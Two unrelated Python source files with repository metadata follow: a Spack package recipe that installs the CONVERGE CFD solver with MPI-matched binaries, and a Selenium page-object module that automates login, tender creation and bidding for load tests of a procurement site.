038c743436bc9587d9f628c227d391966aac0ba1 | 10,569 | py | Python | var/spack/repos/builtin/packages/converge/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 2,360 | 2017-11-06T08:47:01.000Z | 2022-03-31T14:45:33.000Z | var/spack/repos/builtin/packages/converge/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 13,838 | 2017-11-04T07:49:45.000Z | 2022-03-31T23:38:39.000Z | var/spack/repos/builtin/packages/converge/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 1,793 | 2017-11-04T07:45:50.000Z | 2022-03-30T14:31:53.000Z |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import glob
import os
from spack import *
class Converge(Package):
"""CONVERGE is a revolutionary computational fluid dynamics (CFD) program
that eliminates the grid generation bottleneck from the simulation process.
CONVERGE was developed by engine simulation experts and is straightforward
to use for both engine and non-engine simulations. Unlike many CFD
programs, CONVERGE automatically generates a perfectly orthogonal,
structured grid at runtime based on simple, user-defined grid control
parameters. This grid generation method completely eliminates the need to
manually generate a grid. In addition, CONVERGE offers many other features
to expedite the setup process and to ensure that your simulations are as
computationally efficient as possible."""
homepage = "https://www.convergecfd.com/"
url = "https://download.convergecfd.com/download/CONVERGE_2.4/Full_Solver_Packages/converge_install_2.4.10.tar.gz"
# In order to view available versions, you need to register for an account:
# https://download.convergecfd.com/wp-login.php?action=register
version('2.4.10', sha256='5d3c39894598d2395149cfcc653af13b8b1091177290edd62fcf22c7e830d410')
version('2.3.23', sha256='1217d16eaf9d263f917ee468778508bad9dacb7e4397a293cfa6467f39fb4c52')
version('2.2.0', sha256='3885acbaf352c718ea69f0206c858a01be02f0928ffee738e4aceb1dd939a77a',
url="https://download.convergecfd.com/download/CONVERGE_2.2/Full_Solver_Packages/converge_install_2.2.0_042916.tar.gz")
version('2.1.0', sha256='6b8896d42cf7b9013cae5456f4dc118306a5bd271d4a15945ceb7dae913e825a',
url="https://download.convergecfd.com/download/CONVERGE_2.1/Full_Solver_Packages/converge_install_2.1.0_111615.tar.gz")
version('2.0.0', sha256='f32c4824eb33724d85e283481d67ebd0630b1406011c528d775028bb2546f34e',
url="https://download.convergecfd.com/download/CONVERGE_2.0/Full_Solver_Packages/converge_install_2.0.0_090214.tar.gz")
variant('mpi', default=True, description='Build with MPI support')
# The following MPI libraries are compatible with CONVERGE:
#
# +--------------+---------+---------+---------+---------+---------+
# | MPI Packages | v2.0 | v2.1 | v2.2 | v2.3 | v2.4 |
# +--------------+---------+---------+---------+---------+---------+
# | HP-MPI | 2.0.3+ | 2.0.3+ | 2.0.3+ | 2.0.3+ | |
# | Intel MPI | | | | | 17.0.98 |
# | MPICH | ?.?.? | ?.?.? | 1.2.1 | 3.1.4 | ?.?.? |
# | MVAPICH2 | ?.?.? | | | | |
# | Open MPI | 1.0-1.4 | 1.0-1.4 | 1.5-1.8 | 1.5-1.8 | 1.10 |
# | Platform MPI | | | 9.1.2 | 9.1.2 | 9.1.2 |
# +--------------+---------+---------+---------+---------+---------+
#
# NOTE: HP-MPI was bought out by Platform MPI
#
# These version requirements are more strict than for most packages.
# Since the tarball comes with pre-compiled executables,
# the version of libmpi.so must match exactly, or else
# you will end up with missing libraries and symbols.
depends_on('mpi', when='+mpi')
# FIXME: Concretization is currently broken, so this causes:
# $ spack spec converge
# to crash. You must explicitly state what MPI version you want:
# $ spack spec converge@2.4.10 +mpi ^openmpi@:1.10
#
# TODO: Add version ranges for other MPI libraries
depends_on('openmpi@1.10.0:1.10', when='@2.4.0:2.4+mpi^openmpi')
depends_on('openmpi@1.5:1.8', when='@2.2:2.3+mpi^openmpi')
depends_on('openmpi@:1.4', when='@:2.1+mpi^openmpi')
# TODO: Add packages for hp-mpi and platform-mpi
# conflicts('^hp-mpi', when='@2.4:')
conflicts('^intel-mpi', when='@:2.3')
conflicts('^intel-parallel-studio+mpi', when='@:2.3')
# conflicts('^platform-mpi', when='@:2.1')
conflicts('^spectrum-mpi')
# Licensing
license_required = True
license_comment = '#'
license_files = ['license/license.lic']
license_vars = ['RLM_LICENSE']
license_url = 'https://www.reprisesoftware.com/RLM_License_Administration.pdf'
def url_for_version(self, version):
url = "https://download.convergecfd.com/download/CONVERGE_{0}/Full_Solver_Packages/converge_install_{1}.tar.gz"
return url.format(version.up_to(2), version)
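    # Worked example (consistent with the `url` attribute above): for version
    # 2.4.10, version.up_to(2) is '2.4', so url_for_version() returns
    # https://download.convergecfd.com/download/CONVERGE_2.4/Full_Solver_Packages/converge_install_2.4.10.tar.gz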
def install(self, spec, prefix):
# 2.0.0
# converge -> converge-2.0.0-hpmpi-090214
# converge-2.0.0-hpmpi-090214 -> libmpi.so.1, libmpio.so.1
# converge-2.0.0-mpich2-090214 -> libmpich.so.1.2
# converge-2.0.0-mvapich-090214 -> libibumad.so.1
# converge-2.0.0-openmpi-090214 -> libmpi.so.0
# converge-2.0.0-serial-090214
# make_surface
# post_convert
# 2.1.0
# converge -> converge-2.1.0-hpmpi-111615
# converge-2.1.0-hpmpi-111615 -> libmpi.so.1, libmpio.so.1
# converge-2.1.0-mpich2-111615 -> libmpich.so.1.2
# converge-2.1.0-openmpi-111615 -> libmpi.so.0
# converge-2.1.0-serial-111615
# make_surface
# post_convert
# 2.2.0
# converge -> converge-2.2.0-hpmpi-042916
# converge-2.2.0-hpmpi-042916 -> libmpi.so.1, libmpio.so.1
# converge-2.2.0-mpich2-042916
# converge-2.2.0-openmpi-042916 -> libmpi.so.1
# converge-2.2.0-pmpi-042916 -> libmpi.so.1, libmpio.so.1
# converge-2.2.0-serial-042916
# make_surface
# post_convert
# 2.3.23
# converge-2.3.23-hpmpi-linux-64 -> libmpi.so.1, libmpio.so.1
# converge-2.3.23-mpich2-linux-64 -> libmpi.so.12
# converge-2.3.23-openmpi-linux-64 -> libmpi.so.1
# converge-2.3.23-pmpi-linux-64 -> libmpi.so.1, libmpio.so.1
# converge-2.3.23-serial-linux-64
# make_surface_64
# post_convert_mpich_64 -> libmpi.so.12
# post_convert_ompi_64 -> libmpi.so.1
# post_convert_pmpi_64 -> libmpi.so.1, libmpio.so.1
# post_convert_serial_64
# 2.4.10
# converge-2.4.10-intel -> libmpi.so.12, libmpifort.so.12
# converge-2.4.10-mpich -> libmpi.so.12
# converge-2.4.10-ompi -> libmpi.so.12
# converge-2.4.10-pmpi -> libmpi.so.1, libmpio.so.1
# converge-2.4.10-serial
# make_surface_64
# post_convert_mpich_64 -> libmpi.so.12
# post_convert_ompi_64 -> libmpi.so.1
# post_convert_pmpi_64 -> libmpi.so.1
# post_convert_serial_64
# The CONVERGE tarball comes with binaries for several MPI libraries.
# Only install the binary that matches the MPI we are building with.
with working_dir('l_x86_64/bin'):
if '~mpi' in spec:
converge = glob.glob('converge-*-serial*')
post_convert = glob.glob('post_convert_serial*')
elif 'hp-mpi' in spec:
converge = glob.glob('converge-*-hpmpi*')
# No HP-MPI version of post_convert
post_convert = glob.glob('post_convert_serial*')
elif 'intel-mpi' in spec or 'intel-parallel-studio+mpi' in spec:
converge = glob.glob('converge-*-intel*')
# No Intel MPI version of post_convert
post_convert = glob.glob('post_convert_serial*')
elif 'mpich' in spec:
converge = glob.glob('converge-*-mpich*')
post_convert = glob.glob('post_convert_mpich*')
elif 'mvapich2' in spec:
converge = glob.glob('converge-*-mvapich*')
                # MVAPICH2 hasn't been supported since the CONVERGE releases
                # that shipped only a single, serial post_convert binary
post_convert = glob.glob('post_convert')
elif 'openmpi' in spec:
converge = glob.glob('converge-*-o*mpi*')
post_convert = glob.glob('post_convert_o*mpi*')
elif 'platform-mpi' in spec:
converge = glob.glob('converge-*-pmpi*')
post_convert = glob.glob('post_convert_pmpi*')
else:
raise InstallError('Unsupported MPI provider')
make_surface = glob.glob('make_surface*')
# Old versions of CONVERGE come with a single serial post_convert
if not post_convert:
post_convert = glob.glob('post_convert')
# Make sure glob actually found something
if not converge:
raise InstallError('converge executable not found')
if not post_convert:
raise InstallError('post_convert executable not found')
if not make_surface:
raise InstallError('make_surface executable not found')
# Make sure glob didn't find multiple matches
if len(converge) > 1:
raise InstallError('multiple converge executables found')
if len(post_convert) > 1:
raise InstallError('multiple post_convert executables found')
if len(make_surface) > 1:
raise InstallError('multiple make_surface executables found')
converge = converge[0]
post_convert = post_convert[0]
make_surface = make_surface[0]
mkdir(prefix.bin)
# Install the executables
install(converge, join_path(prefix.bin, converge))
install(post_convert, join_path(prefix.bin, post_convert))
install(make_surface, join_path(prefix.bin, make_surface))
with working_dir(prefix.bin):
# Create generic symlinks to all executables
if not os.path.exists('converge'):
os.symlink(converge, 'converge')
if not os.path.exists('post_convert'):
os.symlink(post_convert, 'post_convert')
if not os.path.exists('make_surface'):
os.symlink(make_surface, 'make_surface')
def setup_run_environment(self, env):
# CONVERGE searches for a valid license file in:
# $CONVERGE_ROOT/license/license.lic
env.set('CONVERGE_ROOT', self.prefix)
| 47.608108 | 131 | 0.600341 |
9eb6bf0e41398f024786afbbeb62e3c1dd3d59ad | 11,173 | py | Python | govauction_load/page_objects.py | lesiavl/selenium_perfomance_tests | 83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe | ["Apache-2.0"] | null | null | null | govauction_load/page_objects.py | lesiavl/selenium_perfomance_tests | 83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe | ["Apache-2.0"] | null | null | null | govauction_load/page_objects.py | lesiavl/selenium_perfomance_tests | 83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import selenium.webdriver.support.ui as ui
from selenium.common.exceptions import NoSuchElementException, TimeoutException, ElementNotVisibleException
from locators import *
from time import sleep
import service
def wait_before_click(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.element_to_be_clickable((select_type, element)))
def wait_until_visible(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.visibility_of_element_located((select_type, element)))
def wait_until_invisible(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.invisibility_of_element_located((select_type, element)))
def wait_for_presence(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.presence_of_element_located((select_type, element)))
def wait_for_text_presence(driver, element, text, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.text_to_be_present_in_element((select_type, element), text))
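# Illustrative usage (the locator strings are made up): each helper takes the
# driver, a locator and optionally the locator strategy, waits up to 20 seconds,
# and raises TimeoutException if the condition is not met. The clickable/visible
# variants return the located element, so calls can be chained:
#
#   wait_before_click(driver, '#submit', select_type=By.CSS_SELECTOR).click()
#   wait_until_visible(driver, '//div[@class="notice"]')  # defaults to By.XPATH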
def close_notif(driver):
    """Dismiss the notification popup if it is shown; give up quietly on timeout."""
    try:
        wait_until_visible(driver, close_notification, select_type=By.CSS_SELECTOR)
        # Use a distinct local name so we don't shadow this function itself
        notif_button = driver.find_element_by_css_selector(close_notification)
        sleep(2)
        if notif_button.is_displayed():
            sleep(1)
            wait_before_click(driver, close_notification, select_type=By.CSS_SELECTOR)
            driver.find_element_by_css_selector(close_notification).click()
        else:
            return False
    except TimeoutException:
        return False
class LoginPage:
def __init__(self, email, password, driver):
self.driver = driver
self.email = email
self.password = password
def login_as_owner(self):
wait_until_visible(self.driver, login_button, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(login_button).click()
wait_before_click(self.driver, username_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(username_field).send_keys(self.email)
self.driver.find_element_by_css_selector(pass_field).send_keys(self.password)
self.driver.find_element_by_css_selector(submit_login_button).click()
close_notif(self.driver)
def login_as_provider(self):
wait_until_visible(self.driver, login_button, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(login_button).click()
wait_before_click(self.driver, username_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(username_field).send_keys(self.email)
self.driver.find_element_by_css_selector(pass_field).send_keys(self.password)
self.driver.find_element_by_css_selector(submit_login_button).click()
wait_until_visible(self.driver, login_verif, select_type=By.CSS_SELECTOR)
sleep(1)
close_notif(self.driver)
self.driver.get('http://25h8-exchange.byustudio.in.ua/tenders/index')
class CreateTenderPage:
def __init__(self, driver):
self.driver = driver
def create_tender(self):
self.driver.execute_script("window.scrollTo(0, 318);")
wait_until_visible(self.driver, input_value_amount, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_value_amount).click()
# sleep(2)
self.driver.find_element_by_css_selector(input_value_amount).send_keys(10000)
self.driver.find_element_by_css_selector(input_min_step).send_keys(100)
self.driver.execute_script("window.scrollTo(0, 525);")
self.driver.find_element_by_css_selector(input_title).send_keys('LOAD_TEST_Below_Threshold')
self.driver.find_element_by_css_selector(input_description).send_keys('LOAD_TEST_Below_Threshold')
file_to_upload = service.relative2absolute('./doc1.docx')
sleep(1)
self.driver.find_element_by_xpath(add_doc).send_keys(file_to_upload)
wait_until_visible(self.driver, '//input[@name="Tender[documents][0][title]"]', select_type=By.XPATH)
# self.driver.find_element_by_xpath(submit_doc).click()
wait_until_visible(self.driver, input_item_description, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_item_description).send_keys('LOAD_TEST_Below_Threshold')
self.driver.find_element_by_css_selector(input_quantity).send_keys(10)
self.driver.execute_script("window.scrollTo(0, 973);")
self.driver.find_element_by_css_selector(select_cpv).click()
wait_until_visible(self.driver, select_cpv_1item, select_type=By.XPATH)
self.driver.find_element_by_xpath(select_cpv_1item).click()
wait_for_presence(self.driver, confirm_cpv, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(confirm_cpv).click()
self.driver.execute_script("window.scrollTo(0, 1404);")
wait_until_visible(self.driver, select_country, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_country).click()
wait_until_visible(self.driver, select_dropdown_region, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_dropdown_region).click()
self.driver.find_element_by_css_selector(input_locality).send_keys(u"Ковель")
self.driver.find_element_by_css_selector(input_delivery_address).send_keys("Random Valid Address, 7741")
self.driver.find_element_by_css_selector(input_postal_code).send_keys('02010')
self.driver.find_element_by_css_selector(input_delivery_start_date).click()
self.driver.find_element_by_css_selector(input_delivery_start_date).clear()
delivery_start = service.time_service()[3]
wait_until_visible(self.driver, input_delivery_start_date, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_delivery_start_date).send_keys(delivery_start)
self.driver.find_element_by_css_selector(input_delivery_end_date).click()
self.driver.find_element_by_css_selector(input_delivery_end_date).clear()
delivery_end = service.time_service()[4]
self.driver.find_element_by_css_selector(input_delivery_end_date).send_keys(delivery_end)
self.driver.execute_script("window.scrollTo(0, 2165);")
self.driver.find_element_by_css_selector(input_end_enquiry).click()
self.driver.find_element_by_css_selector(input_end_enquiry).clear()
enquiry_end = service.time_service()[0]
self.driver.find_element_by_css_selector(input_end_enquiry).send_keys(enquiry_end)
self.driver.find_element_by_css_selector(input_start_tender).click()
self.driver.find_element_by_css_selector(input_start_tender).clear()
tender_start = service.time_service()[1]
self.driver.find_element_by_css_selector(input_start_tender).send_keys(tender_start)
self.driver.find_element_by_css_selector(input_end_tender).click()
self.driver.find_element_by_css_selector(input_end_tender).clear()
tender_end = service.time_service()[2]
self.driver.find_element_by_css_selector(input_end_tender).send_keys(tender_end)
wait_until_visible(self.driver, input_procuring_entity, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_procuring_entity).click()
self.driver.execute_script("window.scrollTo(0, 2283);")
wait_until_visible(self.driver, submit_create_tender, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(submit_create_tender).click()
class FindTenderPage(CreateTenderPage):
    def get_tender_id(self):
        # The tender id only appears after the tender has been processed, so
        # poll for it a few times, refreshing the page between attempts.
        tender_id = None
        for _ in range(10):
            sleep(5)
            self.driver.refresh()
            try:
                wait_until_visible(self.driver, tender_get_id_locator)
                tender_id = self.driver.find_element_by_xpath(tender_get_id_locator).text
                break
            except TimeoutException:
                continue
        return tender_id
def find_tender(self, id_tender):
tender_id = id_tender
        try:
            self.driver.get('http://25h8-exchange.byustudio.in.ua/tenders/index')
            close_notif(self.driver)
        except (TimeoutException, ElementNotVisibleException):
            pass
        # Wait for the search field regardless of whether the notification popup appeared
        wait_until_visible(self.driver, input_search_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_search_field).send_keys(tender_id)
self.driver.find_element_by_css_selector(search_tender_button).click()
sleep(1)
wait_for_presence(self.driver, select_tender, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_tender).click()
return tender_id
class MakeBidPage:
def __init__(self, driver):
self.driver = driver
def make_bid(self):
# "LOAD_TEST_Below_Threshold"
is_found = False
for i in range(1, 100):
try:
wait_until_visible(self.driver, input_bid_amount, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_bid_amount).click()
self.driver.find_element_by_css_selector(input_bid_amount).send_keys(10000)
wait_until_visible(self.driver, submit_bid_button, select_type=By.CSS_SELECTOR)
is_found = True
break
except (TimeoutException, NoSuchElementException, ElementNotVisibleException):
sleep(15)
self.driver.refresh()
self.driver.execute_script("window.scrollTo(0, 3238);")
if not is_found:
return False
self.driver.execute_script("window.scrollTo(0, 3238);")
# file_to_upload = service.relative2absolute('./doc1.docx')
# self.driver.find_element_by_xpath(add_doc).send_keys(file_to_upload)
# wait_until_visible(self.driver, '#hidden_document_original > div > div:nth-child(1) > div:nth-child(1) > label', select_type=By.CSS_SELECTOR)
# self.driver.find_element_by_xpath(add_doc).click()
return True
def run_bid(self):
sleep(3)
self.driver.find_element_by_css_selector(submit_bid_button).click()
sleep(5)
try:
wait_for_presence(self.driver, delete_bid_button, select_type=By.CSS_SELECTOR)
sleep(5)
except TimeoutException as error:
print(error)
raise error
return True
| 45.234818 | 151 | 0.721113 |